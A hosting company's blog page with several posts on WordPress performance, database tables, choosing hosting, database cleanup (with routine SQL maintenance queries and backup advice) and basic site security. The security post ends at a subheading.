Kiravo Blog

How to speed up your WordPress website (ultimate guide)

Andrei Chira — Sat, 16 May 2026 00:00:00 GMT

You can learn more about how websites work and how to make your WordPress website load faster and sustain more traffic. Or simply switch to Kiravo and we’ll do it for you.

Why performance matters

Improving site speed can lead to better conversion rates, more page views, better ranking in search engine results, and savings on hosting.

Conversion rate

The slower your website, the less likely your visitors are to buy, contact you, or comment.

Ranking

A faster site ranks better in search engines, leading to more visitors to your site.

Pageviews

The quicker your website loads, the higher the chances of visitors staying longer.

Savings

A lightweight website uses fewer server resources, handling higher traffic without upgrading your hosting.

How websites work

A web page is not a finished product, like a painting. Think IKEA. The pages are assembled in real time by the visitor’s browser after downloading all the assets from the server.

User clicks a link to your website. The visitor’s browser checks the IP of your domain in DNS, then sends the request for the page to the server. If the site uses SSL, the client and server negotiate a secure connection before the request is completed.

The server builds the HTML. The server receives the request and processes the website code. The database and file system are queried for all required elements and the HTML page is compiled. When the HTML is created, the server sends it back to the browser.

The browser reads the HTML and requests all elements. The browser receives the HTML code, reads the code and sees that it needs more elements (CSS files, fonts, images, JavaScript files). They can come from the same server or from other servers, in which case they require new DNS queries and SSL connections.

The browser starts building the page. While still collecting the elements, the browser starts building the page and displays a first version of the page. It’s called First Contentful Paint (FCP) and it’s an important metric. Because the page hasn’t finished loading, the user can’t interact with it yet.

The browser prepares the page for interaction. Several elements on the page must be gathered before the user can start interacting with the page, clicking or scrolling.

The page is ready to use. When all the elements have loaded and all the scripts have completed their configuration tasks, the page is finally ready to use. Our goal when optimising is to reach “ready to use” in the shortest possible time.

Time is of the essence

The loading of a web page can be broken down into three main components. The phrase “site loading speed” is shorthand; what we’re really optimising is time — how long each operation takes.

Server response time. This is where the server works, running the site’s PHP code. If this first request is slow, all other steps in viewing the web page will be delayed.
Data transfer time. The time required to transport the elements that make up the page from the server (or servers) to the browser. It depends on the amount of data and the distance it has to travel.
Page rendering time. Influenced by the quality and complexity of the code to be interpreted, the number of elements and their size, as well as the speed of the device the browser is running on.

How to improve server response time

This is where the server works, processing the PHP code. The objective is to give the server as little work as possible. Or give the work as much server as possible. Ideally both.

Full page cache

Install a WordPress caching plugin or talk to your hosting provider about server-level caching or help with edge caching integration.

Better hosting

Shared web hosting cannot guarantee constant performance. If performance is critical for you, try a managed WordPress hosting or managed WooCommerce hosting solution.

Better plugins

Test the resource usage of WordPress plugins; check if there are plugins that make non-cacheable requests; replace them with better ones.

Database optimisation

Clean up orphaned meta_keys from the wp_postmeta table; clean entries with autoload:yes from the wp_options table; clean old plugin and theme entries; delete expired transients; change table engine to INNODB.

→ Deep dive: How to clean up your WordPress database.

WordPress settings

Disable trackbacks, pingbacks, emojis, embeds; disable or limit revisions; set regular trash cleaning; disable or modify the heartbeat API; disable xml-rpc if not needed; set up a server cronjob.

Better themes

Test the resource usage of your active WordPress theme and, if there are problems, replace it with a lighter theme.

How to improve data transfer time

The objective is to reduce the amount of data that needs to be transferred from the server to the browser, and to reduce the distance over which the data is transferred.

Optimise images

Don’t use higher resolutions than necessary; use the correct format (jpg, png, svg, webp) for each scenario; clean the server of unused images.

→ Deep dive: How to optimise your images.

Optimise fonts

Use only one font, maximum two (one for headings, one for body). Serve font files from your own server, or use system fonts.

Optimise CSS & JS

Remove useless CSS & JS, concatenate them, minify them. The goal is to have fewer and smaller CSS and JS files.

Use a CDN

Several options: Cloudflare (free), Quic.cloud, BunnyCDN, KeyCDN, AWS CloudFront, Google Cloud CDN, or Fastly.

How to improve page rendering time

This is where the browser on the visitor’s device works. We can’t control the speed of their internet connection or the computing power of their device, so we can only give that browser less work.

Reduce DOM complexity

Reduce DOM complexity by using native Gutenberg blocks to build pages instead of page builder plugins.

Better CSS

Reduce CSS complexity, remove syntax errors, reduce the use of @import and !important, remove duplicate or redundant selectors and properties.

Reduce JavaScript

The more JS you have on your site, the harder it will be to get a fast render time. Remove what you can, defer and delay what you cannot.

Prioritise above the fold

Use an optimisation plugin like FlyingPress to optimise the rendering of the above-the-fold section.

Deep dives

Until then, see the Performance category for related articles.

The WordPress database tables: roles and functions

Elena Chira — Tue, 21 Apr 2026 00:00:00 GMT

A standard WordPress installation comes with a set of database tables. Each one has a specific job, like storing articles, pages, settings, users, or comments.

Understanding how WordPress stores its data isn’t just “nice to know”, it makes everything about running a site easier. When beginners learn how the database tables are organised, troubleshooting stops feeling like guesswork. They can see where posts, pages, and settings actually live, which builds confidence fast.

For administrators, this knowledge turns technical issues into manageable tasks instead of mysteries. And for freelancers or developers, it becomes the foundation for reliable debugging, smoother migrations, and cleaner problem‑solving.

In short: knowing your way around the WordPress database helps everyone, no matter their experience level.

WordPress database table descriptions

When you set up WordPress, it creates 12 tables, usually starting with wp_. This wp_ prefix is the default, but you can change it during installation.

wp_commentmeta

This table stores extra comment details. It includes keys and values for plugin data.

wp_comments

All site comments live here. The table includes author names, emails, IP addresses, and comment text.

wp_links

Older versions of WordPress used this table for blogrolls. Some plugins still use it for link management.

wp_options

This table is essential for site configuration. It stores the site URL, admin email, and time zone. Themes and plugins save their settings here.

wp_postmeta

Metadata for posts and pages resides here. It includes page templates, custom fields, and SEO data.

wp_posts

This table holds most content. It includes pages, revisions, menus, and media files.

wp_termmeta

Taxonomy terms have metadata here. Plugins use it for category information or product attributes.

wp_terms

This table contains the actual names of categories and tags.

wp_term_relationships

This table links content to terms. It shows which article belongs to a specific category.

wp_term_taxonomy

This table defines the taxonomy type. It identifies if a term is a category or a tag.

wp_usermeta

Extra user data is stored here. It includes preferences, permissions, and plugin settings.

wp_users

The main table for user accounts. It contains usernames, encrypted passwords, and emails.

In conclusion

Understanding the WordPress database isn’t about becoming a database expert, it’s about knowing your site’s backbone.

Once you recognise what each table does and where key data lives, everything from debugging to migrations becomes far less intimidating.

The more familiar you are with the structure, the more confidently you can manage, fix, and grow any WordPress site.

How to choose the best web hosting for your website

Elena Chira — Tue, 10 Mar 2026 00:00:00 GMT

There are a lot of questions about web hosting, especially what the best web hosting is. If you want to learn more, I’ve put together this detailed guide, which I hope will help you choose the best web hosting for your needs.

Web hosting is a service that helps you to have a publicly accessible website on the Internet. A subscription to a web hosting plan is a rent you pay to have a specialised company manage the services needed to keep your website up and running.

Web hosting is not just the simple renting of space on a server; on that server, software services enable the processing of PHP code, database queries, email sending and receiving, etc.

These services require setup, maintenance and updating, which is the responsibility of the web hosting provider.

By paying for web hosting, you are paying for access to resources, both hardware and software, as well as human resources. Not as in HR, but in terms of care and support.

So it’s not just a simple rent of space, but a wider set of IT services provided by professionals, and specialists in this field:

hosting DNS zones
file hosting
database hosting
hosting email addresses
anti-malware protection
malicious attacks protection (DDOS)
anti-spam and anti-virus filtering for email
server administration, maintenance and optimisation
technical support provided to customers

Due to the massive popularity of shared hosting, most people think of web hosting as a single service, but in fact, there are at least 3 main services:

DNS hosting
application (site) hosting
email hosting

What is DNS hosting?

DNS hosting is the hosting of DNS zones. When you associate a hosting provider’s nameservers with a domain, it means that that provider will host the DNS zones for your domain.

The most common DNS zones are:

A - The record that contains the IP address of a domain.
CNAME - Redirects a domain or subdomain to another domain, not to an IP address.
MX - Directs mail to a mail server.
TXT - Allows an administrator to store text notes in the record. These records are often used for email security.

What is application (site) hosting?

Application hosting is the hosting of your web application, or website (WordPress, another application or even a simple HTML file).

The website hosting is controlled by the DNS type A entry, the record that contains the IP address where a domain is pointed. The Domain Name System (DNS) translates the A record and instead of people having to remember an IP address to type in their browser to access google.com, they will type google.com directly.

What is email hosting?

Email hosting is controlled by MX DNS entries, which direct mail to an email server.

The most common case is that of shared hosting, where all 3 services (DNS, site, mail) are with the same provider, on the same server.

But all these 3 hosting services can also be separate, you can have:

DNS hosting from Cloudflare,
website hosting from Kiravo,
mail hosting from Google Workspace.

What’s the best - all together or separated?

For most sites, the default situation where all hosting components are provided as a single service is sufficient and no separation is needed.

In this case, our shared hosting plans presented above include everything needed.

However, there are also cases where some sites have special needs.

1 - A small brochure-style website of a company can use an affordable shared solution for site hosting because it won’t have high traffic.

But for that company, the email is “business critical”, and the limitations of a shared hosting solution are not good enough.

Thus, they can separate site hosting from email hosting. Keep the website on shared hosting, but for email, opt for a professional email hosting solution, such as Google Workspace, Microsoft 365, Tutanota, Fastmail, ProtonMail, etc.

2 - A high-traffic blog needs website hosting focused on performance and scalability, but doesn’t have much need for email. We have customers who just use Gmail.

Thus, email can be hosted on a low-cost solution or even free (Gmail), while the website can be hosted on a managed WordPress hosting solution with a customised setup designed to handle as much traffic as possible.

These would be two example scenarios when separating website hosting from email hosting is needed.

But most of the time, all these services are put together in one easy-to-use package, which is why the most popular solution is shared hosting with cPanel.

Types of hosting

Hosting solutions span a broad spectrum, offering cost-effective shared environments for new projects and high-performance dedicated solutions for enterprise-level demands.

Shared Hosting

Shared hosting is the most popular, because it’s cheap and because its limitations are good enough for most websites.

As can be inferred from the phrase “shared”, this type of hosting is one in which all customer sites are hosted on a physical (or virtual) server and share its resources.

It is a mass-market web hosting solution, designed to meet the needs of as many website owners as possible.

The main advantage of shared hosting is the value for money, with a relatively low price for the services and benefits.

The main disadvantage of shared hosting is that the performance of your site is affected by the neighbours on the server, more precisely by their resource usage. The loading time of your website is not consistent and cannot be guaranteed by the provider.

Who is it for?

low traffic websites
static websites
brochure-style websites
hobby websites

You should never run critical websites on cheap shared hosting.

Advantages of shared web hosting

low price
decent performance
everything in one place (DNS, web, email)
easy-to-use control panel

Disadvantages of shared web hosting

resource limitations
limited customisation possibilities
inconsistent performance
limited scalability

Responsibilities

The hosting provider manages the infrastructure, and the software running on the server, server security (not your website’s security) and disaster recovery (some may even include a backup of your data).

The customer gets access to an administration panel (the most popular is cPanel) and that’s where their responsibilities start. Clients can install whatever applications they want (the most popular being WordPress), applications that they manage both from a technical point of view and from a content point of view; they can create email addresses, edit DNS zones, restore backups, etc…

What is the best shared hosting?

There are so many shared hosting providers, thousands in each country.

There are many differences among providers of shared hosting, but there are also many similarities; it’s impossible to say one is the best.

But I can say that I would choose independent companies that use a modern stack:

CloudLinux and LiteSpeed, no outdated Apache;
enterprise-grade NVMe SSD storage;
daily backups;
free SSL;
good WordPress knowledge;
not very cheap because low prices attract the wrong kind of tenants, and you don’t want those neighbours.

VPS Hosting (managed)

VPS (Virtual Private Server) is a hosting solution where several virtual servers are created on a physical server, and you rent such a virtual server to host your websites.

Each VPS has a certain level of dedicated resources (RAM, CPU), unlike shared hosting, where cPanel accounts don’t have allocated resources; they have resource limitations.

The cPanel control panel is usually used, as with shared hosting, but the customer has a higher level of access and can create their own cPanel accounts to isolate sites or even resell hosting.

In addition to the advantage of having dedicated resources, another major advantage of a VPS compared to a shared solution is the possibility of customizing certain settings (PHP, MySQL, the number of emails that can be sent per hour, etc.), so fewer limitations than shared hosting.

The main disadvantage of a VPS is the higher costs.

The client hosted on VPS no longer shares resources with other clients, but also no longer shares costs (cPanel license, LiteSpeed webserver license, software backup license, anti-spam software license, server administration, etc.).

Advantages of VPS hosting

better security
better performance
dedicated resources
the possibility of customisations
all-in-one (DNS, web, mail)
better scalability

Disadvantages of VPS hosting

higher costs
it’s also an all-in-one solution with cPanel so still limited
performance is not necessarily better (depends on setup, stack and resources)

Dedicated Servers (managed)

This hosting solution means the entire physical server is leased to a single client.

It is the traditional hosting solution that involves the highest costs but has the advantage of high performance.

Any setting of the services installed on the server can be customised to accommodate the needs of the site and the limitations are only given by the physical ones (the server specifications).

Advantages of dedicated server hosting

better security
better performance
performance can be consistent (no neighbours)
all-in-one (DNS, web, mail)
the possibility of customisation

Disadvantages of dedicated server hosting

higher costs
limited scalability
downtime if a physical server component breaks down

These are managed types of web hosting, usually offered with cPanel or other control panels such as ISPConfig, DirectAdmin, Plesk, etc.

Here, managed means that the hosting provider manages the server and everything running on it (operating system, web server, database server, email server, etc.), while the customer manages their cPanel account and everything in it (website, email addresses, etc.).

Unmanaged Hosting

Unmanaged hosting solutions are virtual or dedicated servers offered by providers without administration, cPanel, or other control panels, with root access, at a much lower price.

They are not for novice users, they are aimed at developers, sysadmins, and DevOps, i.e. people with technical skills needed to manage servers.

You could say that these are not actually web hosting solutions; they are IaaS (Infrastructure as a Service) solutions.

In the sense that you are given access to infrastructure and resources, and you use them to build your web hosting solutions (shared or managed) that you can use for your websites or even resell to end users.

Responsibility

All responsibilities rest with the customer.

These responsibilities represent the installation, configuration and administration of all services running on the server:

operating system (Debian, Ubuntu, etc.)
webserver (Nginx or Apache)
database server (MySQL, Percona or MariaDB)
the mail server
antivirus protection, antispam
firewall, brute-force attacks protection
backup and disaster recovery

In addition, the customer is also responsible for the web applications it installs on the server (WordPress, for example), as well as for the updates of these applications, their maintenance and the publication of content.

Advantages of unmanaged web hosting

low costs money-wise
better performance (if set right)
better uptime
you can build powerful hosting solutions (if you know how)

Disadvantages of unmanaged web hosting

no administration
with great power comes great responsibility
high risks (if you don’t know what you’re doing)
you don’t spend money, but you invest time and effort in managing servers

Cloud hosting

At one point there was a craze with the cloud, everywhere you heard only this magic word. We’ve heard from customers questions like - Will my website be stored in the cloud? Will it never be down because it’s in the cloud? Will it be hosted on multiple servers in the cloud?

The concepts of CDN, high scalability, and high availability are indeed possible on the cloud, but the cloud is not magic.

The cloud is a bucket of resources.

In a data centre, the provider can have 1000 servers, each with certain resources (CPU, RAM, storage space). The provider uses a software application that gathers all the resources of all its servers into a resource bucket.

From here on, the provider has several ways to sell hosting services.

You can create virtual machines (VPS) to sell with management (with cPanel like classic VPS) or without management (with root access like Digital Ocean, Vultr, etc.).

If you want to sell shared hosting, you can create virtual servers onto which you install cPanel and create shared hosting subscriptions.

Another business model would be to sell resources instead of pre-set subscriptions, like Amazon AWS or Google Cloud do, they bill each resource separately:

DNS – $0.20 per zone
SSD storage – $0.017 per GB per month
CPU – $0.033 per vCPU per hour
RAM – $0.004 per GB per hour
Network traffic – $0.12 per GB

At the end of the month, the customer pays for how many resources they used that month.

That would be an explanation for cloud services and web hosting can be called “cloud hosting” if the provider uses the setup explained above.

Managed Web Hosting

The web hosting solutions presented above, especially the traditional ones with cPanel, are generic. It was only a matter of time before specialised solutions would appear.

These specialised web hosting solutions are called managed, but some are not entirely managed, just semi-managed.

Some focus on a specific platform, like WordPress or Magento, and are marketed as managed WordPress hosting or managed Magento hosting.

Despite the name of managed hosting, these solutions are also a kind of semi-managed web hosting. Not classic, with cPanel, but a modern version, based on containers or virtual machines using the public cloud infrastructure or even private clouds.

There are also managed web hosting solutions that are really managed. They are not built on top of existing open-source platforms but have built their own walled gardens, focusing on abstracting the technical part for customers (Squarespace, Shopify or Wix).

Who is managed hosting for?

Managed web hosting is for customers who are willing to invest more money to have a dedicated team behind them. These are generally people who don’t want to bother with the technical part, they just want to publish content and all the technical parts to simply work, even when they have high traffic peaks.

Responsibility

As mentioned above, there are managed hosting solutions where the customer is only responsible for adding content.

Everything that happens behind the scenes is managed by the hosting provider. The provider manages the servers and what is installed on the servers, from the operating system to the platform where you just add your content.

There are also managed WordPress solutions where the website owner can install plugins/themes and is also responsible for the code part (only the WordPress core is managed by the hosting provider, who makes the updates).

Advantages of managed web hosting

fast loading times
high-scalability
great uptime
specialised technical support
it just works

Disadvantages of managed web hosting

higher costs
it’s a niche solution, it’s not all-in-one
does not include email hosting
does not include DNS hosting (depends on the provider)

These would be the types of web hosting currently available to website owners, especially those using WordPress.

Which web hosting should I choose?

Well, the best hosting for others might not be the best for you.

Every website owner has needs, expectations, a level of technical knowledge, a strategy to grow their website, and ultimately, a budget. For different people, the best web hosting plan can mean something completely different.

For a hobby site, the best is an affordable shared web hosting plan.
For a business owner, the best will be a premium hosting plan or a managed WordPress solution.
For a publisher, the best will be a managed WordPress plan in the cloud.
For a shop, the best solution will be a performant WooCommerce hosting.

Evaluate your needs; don’t follow reviews blindly (most are fake or paid for).

What are your needs when it comes to web hosting?

People are different, and websites are different. Nobody else knows what’s important to you. Your answers to the following questions will help you understand exactly what you need when comparing web hosting options.

what are your needs?
what are your website’s needs?
what are your tech support needs?
what’s your budget?

Your needs

These questions may get different responses from different people. Your answers will help you understand exactly what you need when comparing web hosting options.

Do you need to host one site or several?
How important are your websites to you?
Do you need email hosting?
How important is email?
Do you manage the technical aspects yourself?

Your website’s needs

If your site is a low-traffic blog, it won’t need the same things as a high-traffic online store. Identifying what your site needs helps you evaluate your options.

What is the site’s traffic?
Will the site have spikes of high traffic?
Does the site require dedicated resources?
Does the site need constant monitoring?
Does the site need performance optimisation?

Your support needs

Many people underestimate the complexity of owning a website because technology has made it so easy, fast and cheap to launch.

Are you able & willing to handle the technical aspects?
Or do you have an employee or collaborator who can take care of the technical part?
Or do you need technical assistance & support from WordPress experts?

Your budget

The budget is an important criterion, but it shouldn’t be the only or the main filter through which we look at our web hosting options.

How much money do your websites make?
What percentage are you comfortable spending on hosting?
Do you have a 5€ budget for each site you own?
Or do you have a total budget of 5€ for all sites?

Final conclusions

In general, shared hosting is sufficient for most sites.

It includes everything you need: DNS, email, web application hosting, backup, support, and security.

It’s a best-effort solution (provided as-is), but shared web hosting has evolved to deliver surprising performance at a low price; if you have a regular site without special needs, this is the best web hosting solution in terms of quality-price ratio.

By special needs, I mean customizing PHP or MySQL settings, installing additional services (python, ruby, node.js), sending a large number of emails, performing heavier queries on the database (product imports, stock updates, prices) or other needs specific to your website.

For sites with special needs, there are two solutions:

upgrade to a VPS or dedicated server
separate services on specialised providers

I recommend the separation of services:

For web hosting - a specialised web hosting solution for your application with specialised support: managed WordPress hosting, for example.
for email hosting - a specialised solution for email such as Google Workspace, Microsoft Exchange, etc.
for DNS hosting - a solution like Cloudflare, Amazon Route53, DNSMadeEasy, etc
for sending transactional emails from the website (order notifications, invoices, etc.) - a specialized solution such as Postmark, Sendgrid, Mailgun, etc.
for sending marketing emails (newsletters, promotions, etc.) - a specialized solution such as Mailchimp, Drip, ConvertKit, etc.
for SEO, online advertising (Google Ads, Facebook Ads, etc.), marketing, content creation, etc. - a dedicated person on your team or a subscription to a specialised company.
for web application security, web application maintenance and administration - a specialized security solution such as Sucuri, a technical person in the team or a subscription to maintenance service.

It’s in our nature to want to work with just one provider (or as few as possible) to make it easier for us, but there’s no single provider that can be the best at twenty things.

You can start low-cost on shared hosting with cPanel, but beyond a certain point, traditional all-in-one solutions can’t take you further in growing your online business.

The question you need to ask first is not “What’s the best web hosting?” but “What problem am I trying to solve?”

What I want to emphasise in conclusion is that web hosting is not a silver bullet; it is not a magic pill that solves all your website problems, nor should it be viewed as such.

How to clean up your WordPress database (advanced)

Andrei Chira — Thu, 27 Nov 2025 00:00:00 GMT

Almost all WordPress websites I have seen have bloated databases. This is pretty normal. Nobody was born an expert in building super-efficient and optimized sites.

When I started using WordPress, I changed themes monthly and tested many plugins. I used to read those “Top 21 must-have plugins” articles, and I installed them all. A couple of weeks later, I uninstalled them.

This is how you learn: You try, you test, and you discover what you need and what works for you.

But years later, you’re left with a WordPress database full of old, useless stuff. That’s because your website’s database doesn’t hold just your content, but also all theme and plugin settings.

Why is it essential to have a clean database?

One customer, a food blog with ~10,000 visits/day, was experiencing slow loading times of 13-15 seconds. The solution offered by the hosting company was to upgrade to a more expensive hosting plan.

Our solution was different - we performed a site audit after migrating to our hosting platform.

The site audit is free if you pay annually for any hosting plan from Kiravo; you, too, can benefit from this.

We discovered over 25,000 database entries in the wp_options table with autoload set to yes. “Autoload: yes” means that when WordPress initializes, it reads those options from the database, which takes about 11 seconds.

We deleted those old, useless options, and now WordPress loads in 2-3 seconds. We also optimised images, replaced some bad plugins with better ones, and made other minor tweaks.

She didn’t need a more expensive plan; she stayed on the same plan for another 8-9 months until her traffic reached ~60,000 visits/day, at which point it was really time to upgrade.

The benefit of having a clean WordPress database was that it helped her save money on web hosting, have a faster website, and scale to much more traffic effortlessly.

So, let’s see what you can do to optimise your WordPress database to get the same benefits.

Always Backup First

Before performing any database cleanup, you must create a full site backup, including the database and files, or at least the database, since that’s where we’ll make changes. This safeguard lets you quickly restore your site to its previous state if anything goes wrong, saving you time, stress, and potential losses.

Without a backup, you cannot recover accidentally deleted posts, pages, user accounts, or settings. Mistakes during a database cleanup, such as deleting vital tables or corrupting data, can also damage your website, making it inaccessible to visitors.

You can export your database from phpMyAdmin. Your hosting provider should provide access to this database management tool (or a similar one).

We offer access to phpMyAdmin, as well as a built-in backup tool that you can use to take manual backups anytime you want. Also, we offer staging sites. That means you can clone your live website to a staging site and perform any changes there before you do it on a live website.

You can also use a WordPress backup plugin like:

When using a backup plugin, please ensure the backup archive is usable outside WordPress. If the site breaks, you need to be able to restore without wp-admin access.

Basic WordPress Cleanup

The easiest way to clean up your WordPress database, especially for non-technical people, is to use a WordPress plugin.

The most popular database optimization plugins are:

There are also caching and optimization plugins that also have database cleaning options integrated, like:

We recommend WP-Sweep because it uses proper WordPress delete functions as much as possible instead of running direct delete MySQL queries.

Install and activate the WP Sweep plugin then go to Tools > Sweep. You will see different sections with a Sweep button next to them, click the button to clean the clutter.

This plugin will help you delete:

Revisions
Auto-drafts
Deleted, unapproved & spammed comments
Orphaned & duplicated post meta
Orphaned & duplicated comment meta
Orphaned & duplicated user meta
Orphan term relationships
Unused terms
Transient options

The plugin can also optimize tables, and it’s easier than doing it via phpMyAdmin.

Another plugin we recommend is LiteSpeed Cache. It can clean the WordPress database and convert the database tables from MyISAM to InnoDB.

You can also see the list of autoload entries, their number, and size using LiteSpeed Cache.

As a bonus, I recommend the Scalability Pro plugin for WooCommerce; it resolves some native performance issues.

Advanced WordPress Cleanup

After cleaning with the easy method, you should also check manually, more thoroughly, if there are still things that can be optimized in the database.

Many optimizations can be done for the WordPress® database, but there are some significant issues that, once solved, our database should perform well enough. So, let’s focus on solving these problems with the most significant benefit.

These are:

cleaning meta keys from the wp_postmeta
cleaning the autoload entries from the wp_options table
restoring lost primary key from the wp_options table

Cleaning meta keys from the wp_postmeta table

Even after cleaning the database with a plugin like WP Sweep, unnecessary entries may still exist in the wp_postmeta table because not everything has been cleaned.

Access the database with phpMyAdmin or any database management tool, go to the wp_postmeta table and see what the entries are.

Let’s take this example.

You can see that there are many entries with the eg_ prefix. You can ask ChatGPT: What WordPress plugin has put entries with the eg_ prefix in my wp_postmeta table?

ChatGTP tells me that it’s the Essential Grid plugin. If you’re no longer using this plugin, you can delete all these entries manually or by running a query to delete them in bulk.

DELETE FROM wp_postmeta WHERE meta_key LIKE 'eg_%';

This query deletes all meta keys that start with eg_. Don’t forget to backup your database or at least the wp_postmeta table before you start running queries to clean the table.

Repeat the process with any other meta keys that you find to be in a large number and you don’t recognize what they are and what are they used for.

Cleaning the autoload entries from the wp_options table

This is the problem we discussed in the introduction of this article: the wp_options table became bloated with entries with the Autoload value set to Yes.

These entries are read each time WordPress is initialized.

The easiest way to see these entries is to use the LiteSpeed Cache plugin and go to the Database section. Scroll to Database Summary and see the list of autoload entries, their number, and size.

In the example above, there are no issues; it’s a clean database, but if you see on your website some huge entries, you can ask Chat GPT: What plugin has put the X entry in the wp_options table of my WordPress database?

You can thus identify the plugin that added that data, and if you no longer use it, you can delete the respective entry.

DELETE FROM wp_options WHERE option_name LIKE 'your-option-name';

The SQL query from above delete the entry, just replace your-option-name with the actual name of the entry.

Do not forget to back up the database or at least the wp_options table before starting the cleanup.

Restoring the lost primary key from the wp_options table

Another problem I encountered is related to the wp_options table, namely there are cases where this table loses its primary key.

The option_id field is by default configured to be the primary key.

The primary key guarantees the uniqueness of each row in the table and allows indexing of rows for quick access. If we have duplicate values and the primary key is lost, operations on this table will be slower because it is no longer possible to quickly access a specific row. A full table scan is performed—that is, every row in the table is read to find the necessary data, which takes more time.

In some situations, such as manual migrations with mysqldump from one server to another, the table may lose its primary key when MySQL versions are different between servers.

option_id	option_name
1	option1
2	option2
3	option3
0	option4
0	option5
0	option6

To solve this situation, we need to make the option_id column the primary key again. However, we can’t do that if there are duplicate values, the ones with 0, so they have to be deleted or renumbered.

Deleting them resets theme or plugin configurations, but we can renumber them. Run these queries on your wp_options table.

SET @new_option_id := 4;
UPDATE wp_options
SET option_id = (@new_option_id := @new_option_id + 1)
WHERE option_id IN (
    SELECT option_id
    FROM (
        SELECT option_id
        FROM wp_options
        WHERE option_id = 0
        GROUP BY option_id
        HAVING COUNT(*) > 1
    ) AS duplicates
);
DELETE FROM wp_options WHERE option_id = 0;
ALTER TABLE wp_options ADD PRIMARY KEY  (option_id);

The queries you see on the screen do the following:

Sets a starting point for option_id. For example, the numbering stopped at 3 in the example above, so we set 4 as the new starting point.
Identifies duplicates of option_id with value 0 and updates them with new values starting from the set value
Removes any remaining rows where option_id is 0
Adds the primary key on option_id

Make sure to change the default prefix (wp_) to the one your database is using, and set the according number (the code uses 4 as an example).

After that, run the following queries.

ALTER TABLE wp_options AUTO_INCREMENT = 7;
ALTER TABLE wp_options MODIFY option_id bigint(20) unsigned NOT NULL auto_increment;
CHECK TABLE wp_options;
REPAIR TABLE wp_options;

The queries do the following:

Sets a new starting value for AUTO_INCREMENT to the last number - in our example, they stopped at 6, so we set 7 as the new starting point
We turn on auto_increment for the option_id column
We are doing a check table
And a repair table

Again, make sure to change the default prefix (wp_) to the one your database is using. And set the according number (the code uses 7 as an example).

Before starting this operation, please don’t forget to back up your database or the wp_options table.

You can run these queries in phpMyAdmin (a tool accessible from your hosting control panel) or with a database management tool like Sequel Ace (Mac) or MySQL Workbench (Windows, Linux, Mac).

I use Sequel Ace, and I prefer it to phpMyAdmin because it’s faster and more stable. PhpMyAdmin can sometimes crash due to PHP limitations, especially on shared hosting.

Best practices to keep your WordPress database clean

Most plugins and themes don’t clean after themselves, so you need to perform a cleanup occasionally to ensure everything is in tip-top shape.

Optimization plugins have this feature of scheduling automatic cleaning and reducing the bloat of the database:

FlyingPress
WP Rocket
Perfmatters

You can set it to weekly, monthly, or whatever schedule you like.

I also recommend deleting unused plugins & themes. This also helps from a security point of view. I recommend you don’t keep PHP scripts (plugins, themes, other PHP files) on your server other than what you actively use.

To remove unused plugins, log in to wp-admin and go to Plugins > Installed plugins. Click on Inactive to view inactive plugins and delete them.

To remove unused themes go to Appearance > Themes. Click on each theme you want to delete, and then click Delete in the lower right corner.

I recommend you keep only your active theme and one default theme (if you need to test incompatibilities).

You can also keep the revisions from piling up by limiting the number of revisions stored in the database, 30, for example. Add the following code to the wp-config.php file.

define( 'WP_POST_REVISIONS', 30 );

Don’t leave comments unapproved - approve them, spam them, or trash them.

Beware of plugins that store a lot of data:

statistics plugins
security plugins
anti-spam plugins
related posts plugins
link tracking plugins

I’m not saying you shouldn’t use any of the above plugins, but use plugins that offer those functionalities and save data externally, not in your WordPress database.

If possible, avoid using plugins that add bloat. Keep the WordPress database as light as possible. It’s better to prevent than to treat bloat.

Effective database optimization ensures fast, reliable, and scalable websites. Implementing best practices can significantly improve database performance while reducing operational costs. Remember, database optimization is not a one-time task but an ongoing process that evolves with your system’s needs and growth.

Thank you for reading this article on database optimization. I hope it has provided valuable insights and practical tips to enhance the performance of your WordPress databases.

If you have any questions, feedback, or additional techniques you’d like to share, feel free to leave a comment or reach out. Together, we can build better, faster, and more efficient websites!

WordPress security guide: how to keep your site safe

Andrei Chira — Tue, 07 Oct 2025 00:00:00 GMT

I’ve been using WordPress since 2008. Throughout this time, I’ve been fortunate enough to never face a hacked or infected site of my own.

But luck is not a security strategy. While my experience has been secure, many WordPress site owners worry about hacking and infections, a genuine concern that drives the need for proactive security. The key principle here is that everyone online faces security risks.

There is no 100% security, and if you have a public site, you’re a target 24/7.

Attacks aren’t personal. They occur automatically and frequently. This is why you need a proactive, multi-layered security plan.

Securing WordPress takes more than just installing a security plugin.

Is WordPress secure?

Yes, WordPress core is secure. Its popularity, though, makes it a prime target for attackers.

However, most vulnerabilities don’t stem from WordPress itself, contrary to popular belief.

~96% of vulnerabilities come from plugins
~4% come from themes
Only 0.001% come from WordPress core

Source: State of WordPress Security 2025 (Patchstack)

This shows that our main responsibility is to properly manage the elements we add on top of the WordPress core; choosing high-quality plugins and themes and keeping them up-to-date is essential to securing WordPress.

What are the real causes of infections?

A study of 9.5 million WordPress sites found that the biggest risk is unauthorised access, not code vulnerabilities.

59.9% of sites were infected through stolen session cookies
32.9% through vulnerabilities in plugins and themes
7.2% through compromised access credentials

Source: We watch your website

With this in mind, protecting session cookies becomes essential to keep your site safe. If stolen, session cookies give attackers unrestricted access, bypassing all login methods.

Knowing this information, let’s see how we can secure our sites.

How to secure your WordPress website

Based on what we’ve seen, the top priority should be protecting session cookies. Session cookies are bits of data stored by your browser when you log into a site, and they help the website remember who you are during your visit.

These are obtained outside the WordPress ecosystem by infecting the administrator’s computer with malware that steals cookies from the browser.

If a session cookie is valid and has not expired, the attacker has full access, regardless of two-factor authentication (2FA) or other login protection methods. Once the cookie is obtained, the attacker can extend the session’s validity and maintain access to the site.

Our second priority is maintaining a clean and up-to-date WordPress ecosystem, ensuring no security vulnerabilities exist.

Let’s take it step by step.

Step 1 - Secure your devices

If your device gets compromised, your site is at risk, regardless of how well you’ve secured WordPress.

Let’s explore some practical steps to effectively secure your devices. By strengthening your device security, the risk of unauthorized access to your WordPress site will be greatly reduced.

The recommendations would be the following:

Use an antivirus/antimalware protection

Install a trusted security solution and run periodic scans to protect your system.

Malware on your computer can include a keylogger (which records everything you type, including passwords) or a stealer (specialising in stealing session cookies and saved passwords).

Even with a secure site, if your device is compromised, attackers can gain access. Use trusted tools like Bitdefender or Windows Defender, and keep them up to date. If unsure, start with Windows Defender on Windows, as it is reliable and built-in. Schedule a complete scan at least once a week.

Keep your system updated

Ensure that your operating system and web browser are up to date.

Updates aren’t just about new features. A large part of them contain critical security patches that close recently discovered “holes.”

Hackers actively exploit these known vulnerabilities on outdated systems to gain control over devices. Enable automatic updates for both the operating system and browser. It’s the simplest and most effective method to stay protected without constant effort.

Be careful with browser extensions

